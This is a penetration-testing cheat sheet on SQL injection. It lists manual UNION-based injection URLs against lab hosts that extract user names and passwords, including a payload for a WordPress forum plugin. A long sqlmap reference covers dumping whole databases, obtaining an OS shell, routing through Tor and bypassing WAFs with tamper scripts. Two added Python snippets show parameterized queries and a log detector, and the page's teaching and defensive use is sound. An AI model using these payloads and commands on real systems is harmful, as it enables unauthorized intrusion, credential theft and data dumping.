# SQL Injection

## Manual tests

```
http://10.11.15.137/comment.php?id=756'
http://10.11.15.137/comment.php?id=756 order by 7
http://10.11.15.137/comment.php?id=756 union all select 1,2,4,5,6,7
http://10.11.15.137/comment.php?id=756 union all select 1,2,4,5,table_name,7 from information_schema.tables
http://10.11.15.137/comment.php?id=756 union all select 1,2,4,5,column_name,7 from information_schema.columns where table_name='users'
http://10.11.15.137/comment.php?id=756 union all select 1,2,4,5,concat(name,0x3a,password),7 FROM users

http://10.11.1.251/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381 union all select 1
http://10.11.1.251/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381+union+select+group_concat(user_login,0x3a,user_pass)+from+wp_users
```
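To show why the `id=756 union all select ...` probe above works at all, here is an added example (not part of the original cheat sheet) with a constructed SQLite stand-in for the `comment.php` backend: the vulnerable lookup interpolates the request parameter into the SQL text, the hardened one binds it as a parameter so the same input is never parsed as SQL.

```python
import sqlite3

# Constructed in-memory stand-in for the comment.php backend (sample rows only).
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE comments(id INTEGER, author TEXT, body TEXT);
        CREATE TABLE users(id INTEGER, name TEXT, password TEXT);
        INSERT INTO comments VALUES (756, 'alice', 'first post');
        INSERT INTO users VALUES (1, 'admin', 'hunter2');
    """)
    return con

def lookup_vulnerable(con, id_value):
    # String interpolation: the request parameter becomes part of the SQL text,
    # so a UNION in the parameter is executed as a second SELECT.
    sql = f"SELECT id, author, body FROM comments WHERE id = {id_value}"
    return con.execute(sql).fetchall()

def lookup_safe(con, id_value):
    # Parameter binding: the value travels separately from the SQL text and is
    # compared as a single literal; the UNION text never reaches the parser.
    sql = "SELECT id, author, body FROM comments WHERE id = ?"
    return con.execute(sql, (id_value,)).fetchall()

# Same shape as the page's probe, with the column count matched to the stand-in table.
PAYLOAD = "756 union all select 1,name,password from users"

def demo():
    con = make_db()
    return lookup_vulnerable(con, PAYLOAD), lookup_safe(con, PAYLOAD)

if __name__ == "__main__":
    vuln, safe = demo()
    print("vulnerable:", vuln)   # comment row plus the users row leaked by the UNION
    print("hardened:  ", safe)   # empty: no comment has that literal as its id
```

Rejecting non-integer ids before the query (for example with `int(id_value)`) is a useful second layer, but parameter binding is what removes the injection itself.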

## SQLmap 101

### Simple Usage

If you don't know anything about the target site, run the plain command first and check whether sqlmap finds anything interesting.

```
sqlmap -u "https://target_site.com/page/"
```

### Automatic GET request parameter

```
sqlmap -u "https://target_site.com/page?p1=value1&p2=value2"
```

### Specify the GET request parameters to Exploit

You can choose which parameter to check or exploit for SQL injection with the `-p` flag.

```
sqlmap -u "https://target_site.com/page?p1=value1&p2=value2" -p p1
```

### Use POST requests (Test All parameters)

```
sqlmap -u "https://target_site.com/page/" --data="p1=value1&p2=value2"
```

### SQLMap Request file as input

You can pass a file containing the raw HTTP request; the quickest way to get one is to save it from Burp Suite.

```
sqlmap -r request.txt
```

Here you can still target one parameter with `-p`; otherwise sqlmap will detect and test every parameter found in the request.

**Specify Custom Position in HTTP request file**

You can use an asterisk (**\***) to mark which parameter, or which place in the request, should be tested. Any part of the request can be marked this way.

### Use Authenticated Session With Cookie

```
sqlmap -u "https://target_site.com/page/" --data="p1=value1&p2=value2" --cookie="Session_Cookie_Value"
```

### Use Authenticated Session with Auth Headers

```
sqlmap -u "https://target_site.com/page/" --data="p1=value1&p2=value2" --headers="Authorization: Basic YWxhZGRpbjpvcGVuc2VzYW1l"
```

### Basic Authentication

```
sqlmap -u "https://target_site.com/page/" --data="p1=value1&p2=value2" --auth-type=basic --auth-cred=username:password
```

### Use Previously created Session as SQLmap input (-s)

Once sqlmap confirms an injection point, it automatically writes a session file (`.sqlite`) for later use. If you want to run other commands later, you can feed that session file back in, which saves re-trying every payload to re-identify the vulnerability.

```
sqlmap -u "https://target_site.com/page?p1=value1" -s SESSION-FILE.sqlite --dbs
```

The session file is stored in sqlmap's output directory under your home path.

## Post Exploitation Commands

Once the SQL injection vulnerability has been confirmed, you can use the following commands to exploit it.

### List the Databases

```
sqlmap -u "https://target_site.com/page?p1=value1" --dbs
```

### List Tables of Database TARGET\_DB

```
sqlmap -u "https://target_site.com/page?p1=value1" -D TARGET_DB --tables
```

### List Columns of Table TARGET\_TABLE of Database TARGET\_DB

```
sqlmap -u "https://target_site.com/page?p1=value1" -D TARGET_DB -T TARGET_TABLE --columns
```

### Dump Specific Data of Columns of Table TARGET\_TABLE of Database TARGET\_DB

```
sqlmap -u "https://target_site.com/page?p1=value1" -D TARGET_DB -T TARGET_TABLE -C "Col1,Col2" --dump
```

### Fully Dump Table TARGET\_TABLE of Database TARGET\_DB

```
sqlmap -u "https://target_site.com/page?p1=value1" -D TARGET_DB -T TARGET_TABLE --dump
```

### Dump full Database

```
sqlmap -u "https://target_site.com/page?p1=value1" -D TARGET_DB --dump
```

### Custom SQL query

```
sqlmap -u "https://target_site.com/page?p1=value1" --sql-query "SELECT * FROM TARGET_DB.TARGET_TABLE;"
```

### Get OS Shell

```
sqlmap -u "https://target_site.com/page?p1=value1" --os-shell
```

### Get SQL shell

```
sqlmap -u "https://target_site.com/page?p1=value1" --sql-shell
```

## SQLMap Proxy

### Proxy through Burpsuite

```
sqlmap -u "https://target_site.com/page?p1=value1" --proxy="http://127.0.0.1:8080/"
```

### Use Tor Socks5 proxy

```
sqlmap -u "https://target_site.com/page?p1=value1" --tor --tor-type=SOCKS5 --check-tor --dbs
```

## Extra

### Specify The Database Type

```
sqlmap -u "https://target_site.com/page?p1=value1" --dbms=mysql
```

Other supported DBMS types include *MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, Percona, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Amazon Redshift, Vertica, Mckoi, Presto, Altibase, MimerSQL, CrateDB, Greenplum, Drizzle, Apache Ignite, Cubrid, InterSystems Cache, IRIS, eXtremeDB, FrontBase*, etc.

### Attack Techniques

**--technique**: specify one or more letters from **BEUSTQ** to control which injection techniques are attempted:

* **B**: Boolean-based blind
* **E**: Error-based
* **U**: Union query-based
* **S**: Stacked queries
* **T**: Time-based blind
* **Q**: Inline queries

```
sqlmap -u "https://target_site.com/page?p1=value1" --technique=BEUSTQ
```

### Specify the Test Level and Risk

You can control how thorough the tests are using two flags:

1. `--level=LEVEL`     Level of tests to perform (1-5, default 1)
2. `--risk=RISK`       Risk of tests to perform (0-3, default 1)

```
sqlmap -u "https://target_site.com/page?p1=value1" --risk=3 --level=5
```

**Option: `--risk`**

This option takes an argument that specifies the risk of the tests to perform. There are **three** risk values.

**--risk=1**: the default value, suitable for the majority of SQL injection points.

**--risk=2**: adds heavy-query time-based SQL injection tests to the default level.

**--risk=3**: additionally adds `OR`-based SQL injection tests.

**Option: `--level`**

When the value of `--level` is >= **2**, sqlmap also tests HTTP *`Cookie`* header values. When the value is >= **3**, it also tests the HTTP *`User-Agent`* and *`Referer`* header values for SQL injection.

### Use Default Options for the process

Use the **--batch** flag to accept all default options; it is intended for non-interactive sessions. (With **--batch**, sqlmap will not prompt you for (Y/N) choices but will pick the default answer itself.)

```
sqlmap -u "https://target_site.com/page?p1=value1" --batch
```

### **--force-ssl** flag

Forces sqlmap to use SSL/TLS for its requests.

If you get the following error during testing, add the **--force-ssl** flag so that sqlmap connects over SSL/TLS:

```
Error: Can't establish SSL connection
```

### Tamper Scripts

Tamper scripts rewrite the payload before it is sent, which is used to **bypass a WAF** or otherwise **modify the payload**. Several tamper scripts can be chained at once with the **--tamper** flag.

```
sqlmap -u "https://target_site.com/page?p1=value1" --tamper=charencode
```

#### For general purpose use:

```
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
```

#### MSSQL:

```
--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
```

#### MySQL:

```
--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
```

Alternatively, you can write your own custom tamper script for cases where the application expects the payload to be transformed first, for example encrypted (AES, DES) or hashed.
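As an added defender-side example (not part of the original cheat sheet), the following Python normalizes request query strings the way the tamper scripts above obfuscate them (URL encoding, `+` and `/**/` in place of spaces, mixed case) before matching the UNION and `information_schema` probes from the manual tests; the access-log lines are constructed and the signature names are my own.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed Apache combined-format log lines: a benign request, the page's
# plain UNION probe, and a probe obfuscated in the style of the charencode,
# space2comment and randomcase tampers.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /comment.php?id=756 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /comment.php?id=756%20union%20all%20select'
    '%201,2,4,5,table_name,7%20from%20information_schema.tables HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /comment.php?id=756/**/UnIoN/**/aLl/**/'
    '%53%45%4c%45%43%54/**/1,2,4 HTTP/1.1" 200 1024',
]

# Signatures applied to the normalized query string (hypothetical names).
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b"),
    "schema_enum": re.compile(r"\binformation_schema\."),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\b"),
}

REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def normalize(query):
    # Decode twice (charencode / chardoubleencode), treat '+' as a space
    # (space2plus), turn inline comments into spaces (space2comment),
    # collapse runs of whitespace (multiplespaces) and fold case (randomcase).
    q = unquote(unquote(query))
    q = q.replace("+", " ")
    q = re.sub(r"/\*.*?\*/", " ", q)
    q = re.sub(r"\s+", " ", q)
    return q.lower()

def flag_line(line):
    m = REQUEST_LINE.search(line)
    if not m:
        return []
    query = normalize(urlsplit(m.group(1)).query)
    return [name for name, rx in SIGNATURES.items() if rx.search(query)]

def scan(lines):
    # Map log-line index to the signatures it triggers; clean lines are omitted.
    hits = {}
    for i, line in enumerate(lines):
        flagged = flag_line(line)
        if flagged:
            hits[i] = flagged
    return hits

if __name__ == "__main__":
    for idx, names in scan(LOG_LINES).items():
        print(idx, names)
```

Matching on the decoded, comment-stripped, case-folded query rather than the raw line is what keeps the same rule effective whether or not a tamper script was applied.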

{% embed url="<https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet>" %}


{% embed url="<https://thedarksource.com/sqlmap-cheat-sheet/>" %}

{% embed url="<https://www.exploit-db.com/papers/13045>" %}

{% embed url="<https://sqlwiki.netspi.com/detection#mysql>" %}
